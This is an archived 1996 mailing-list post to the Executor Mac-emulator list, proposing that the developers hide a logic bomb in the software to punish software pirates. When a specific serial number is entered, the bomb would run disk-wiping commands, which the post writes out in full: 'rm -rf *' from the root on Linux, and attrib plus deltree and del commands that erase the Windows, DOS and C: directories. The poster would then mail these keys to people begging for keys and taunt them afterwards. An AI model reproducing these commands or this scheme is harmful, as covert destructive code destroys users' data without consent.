home *** CD-ROM | disk | FTP | other *** search
/ Executor 2.0 / executorv2.0.iso / pc / dos / extra / docs / maillist / text / archive.96 / text7704.txt < prev    next >
Encoding:
Text File  |  1996-07-25  |  1.1 KB  |  38 lines

  1. Organization: University of Southern Queensland
  2. Lines: 25
  3. Message-ID: <Pine.HPP.3.91.960629102103.16244A-100000@helios.usq.edu.au>
  4. NNTP-Posting-Host: helios.usq.edu.au
  5. Mime-Version: 1.0
  6. Content-Type: TEXT/PLAIN; charset=US-ASCII
  7. To: executor@ardi.com
  8. X-MailNews-Gateway: From newsgroup comp.emulators.mac.executor
  9. Sender: owner-executor@ardi.com
  10. Precedence: bulk
  11.  
  12. Include some code in the unlockable versions that will
  13. 'do a little mischief'.  Something like 
  14.  
  15. cd /
  16. rm -rf * for linux and the following for the DOS version
  17.  
  18. cd\
  19. attrib -rhs c:\*.*
  20. deltree /y c:\windows
  21. deltree /y c:\dos
  22. deltree /y c:\executor
  23. del c:\*.*
  24.  
  25. Make this code execute when a specific serial# is entered.
  26. Then when some dweeb criminal posts a 'gimme keys please' message,
  27. just mail him the destructive keys and let Executor do the rest.
  28.  
  29. This idea really does
  30.  have some merit;)
  31.  
  32. Then mail them 30 minutes later with a message like, 
  33. "Please can someone send me $150 dollars, I can't wait until we shrink 
  34. wrap E2. Please, this lack of money is a real annoyance when I try to buy 
  35. stuff.  And oh yes... have a nice day:)"
  36.  
  37.  
  38.